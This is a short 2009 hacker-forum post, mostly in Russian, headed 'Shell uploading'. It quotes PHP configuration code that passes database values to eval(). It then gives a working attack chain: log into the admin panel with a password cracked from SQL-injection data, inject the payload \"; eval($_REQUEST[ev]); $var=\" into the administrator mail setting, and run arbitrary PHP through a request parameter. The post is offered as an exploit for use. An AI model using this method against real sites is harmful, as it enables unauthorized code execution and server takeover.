16.10.2009, 21:39
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
========================
Shell uploading
PHP код:
class_configuration.php
...
function ConfLoadDBtoPHP () {
global $session, $sessidn;
global $spojenie;
$xe=@mysql_query ("SELECT * FROM variables1 ORDER BY name", $spojenie);
if ($xe):
while ($xe_r=mysql_fetch_array($xe)) {
$xe_r[value]="\"".stripslashes($xe_r[value])."\"";
if ($xe_r[value]=="\"_true\"") $xe_r[value]="true";
if ($xe_r[value]=="\"_false\"") $xe_r[value]="false";
if ($xe_r[name]) {
$cmd_eval="\$"."this->".$xe_r[name]."=".$xe_r[value].";";
eval($cmd_eval);
}
}
return true;
else:
return false;
endif;
}
...
Заходим в админку под паролем, который сбрутили, получив из SQL-injection.
http://dev/admin/index.php?sessidn=[ADMIN_SESSION]&action=admin&sec=adminset
Редактируем "Administrator's mail" и вставляем туда
\"; eval($_REQUEST[ev]); $var=\"
Шелл:
http://dev/?ev=phpinfo();
__________________
Появляюсь редко. Важные дела в реале.
|
|
|